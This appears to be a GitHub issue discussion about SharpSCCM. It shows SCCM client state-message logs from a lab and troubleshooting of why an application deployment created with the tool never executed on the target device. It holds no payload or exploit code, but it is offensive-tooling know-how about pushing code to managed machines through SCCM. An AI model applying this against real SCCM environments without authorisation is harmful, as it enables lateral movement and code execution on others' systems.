<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/DeploymentType_233a1765-6e57-4676-a75f-7d785de2388d/1]LOG]!><time="18:33:05.809-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/Application_b5084966-2120-4a13-8379-121fb637ddf7/1]LOG]!><time="18:33:05.809-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Aging out message in WMI with TopicType 1702:APP_CI_ENFORCEMENT and TopicId ScopeId_CEFF23EB-79A7-4C02-A887-C2B8019502DC/RequiredApplication_b5084966-2120-4a13-8379-121fb637ddf7/1]LOG]!><time="18:33:05.809-120" date="07-24-2025" component="StateMessage" context="" type="2" thread="2116" file="statemsg.cpp:2774">
<![LOG[Successfully forwarded State Messages to the MP]LOG]!><time="18:33:05.856-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="2116" file="statemsg.cpp:2637">
<![LOG[Failed to find State message with TopicType 2100:WP_CLIENT_DEPLOYMENT and TopicId WPDeploymentState in the StateMsg store]LOG]!><time="18:34:05.293-120" date="07-24-2025" component="StateMessage" context="" type="3" thread="4140" file="statemsg.cpp:875">
<![LOG[Adding message with TopicType 2100:WP_CLIENT_DEPLOYMENT and TopicId WPDeploymentState to WMI]LOG]!><time="18:34:05.293-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="4140" file="statemsg.cpp:880">
<![LOG[State message(State ID : 1:WPCLIENT_NOT_INSTALLED) with TopicType 2100:WP_CLIENT_DEPLOYMENT and TopicId WPDeploymentState has been recorded for SYSTEM, priority 5]LOG]!><time="18:34:05.293-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="4140" file="statemsg.cpp:542">
<![LOG[Failed to find State message with TopicType 1600:USER_AFFINITY and TopicId lab/administrator_Auto0 in the StateMsg store]LOG]!><time="18:35:01.237-120" date="07-24-2025" component="StateMessage" context="" type="3" thread="2552" file="statemsg.cpp:875">
<![LOG[Adding message with TopicType 1600:USER_AFFINITY and TopicId lab/administrator_Auto0 to WMI]LOG]!><time="18:35:01.237-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="2552" file="statemsg.cpp:880">
<![LOG[State message(State ID : 2:USER_AFFINITY_REMOVE) with TopicType 1600:USER_AFFINITY and TopicId lab/administrator_Auto0 has been recorded for SYSTEM, priority 5]LOG]!><time="18:35:01.246-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="2552" file="statemsg.cpp:542">
<![LOG[Failed to find State message with TopicType 1600:USER_AFFINITY and TopicId lab/rai_Auto0 in the StateMsg store]LOG]!><time="18:35:01.264-120" date="07-24-2025" component="StateMessage" context="" type="3" thread="2552" file="statemsg.cpp:875">
<![LOG[Adding message with TopicType 1600:USER_AFFINITY and TopicId lab/rai_Auto0 to WMI]LOG]!><time="18:35:01.264-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="2552" file="statemsg.cpp:880">
<![LOG[State message(State ID : 2:USER_AFFINITY_REMOVE) with TopicType 1600:USER_AFFINITY and TopicId lab/rai_Auto0 has been recorded for SYSTEM, priority 5]LOG]!><time="18:35:01.320-120" date="07-24-2025" component="StateMessage" context="" type="1" thread="2552" file="statemsg.cpp:542">

Note that there is no "powershell" string in the file, I checked both by manually looking and by running Get-ChildItem -File | Select-String "Application_" | Select-String "powershell" | Select-Object -ExpandProperty Filename -Unique

I didn't run any further SharpSCCM commands for 15 minutes, then checked the log files again, no new files got populated with any values.

2nd attempt
I reset the lab environment, logged back in and emptied all log files then recreated the whole thing manually using SharpSCCM (new collection, new collection-member, new application, new deployment, invoke update), I also made sure that the app isn't hidden from SCCM console, still ended up with no execution, when I tried to force the app from console it said app is already enforced

It is super weird!

[Mayyhem]

Hey @init5-SF , sorry for the delay. I forgot to return to this after your last reply. Based on the logs, the application never made it down to the device before the deployment was automatically cleaned up. Although "Application_" appears in the logs, your application Application_7c6fabaa-543a-4030-851e-12ca353ca2f6 does not. One other thing you could try is the SharpSCCM.exe invoke update command or Control Panel > Configuration Manager > Actions > Download Machine Policy to try and force that device to fetch the machine policy. You can use PolicySpy (that ships with ConfigMgr) to view the policies that make it down to the machine.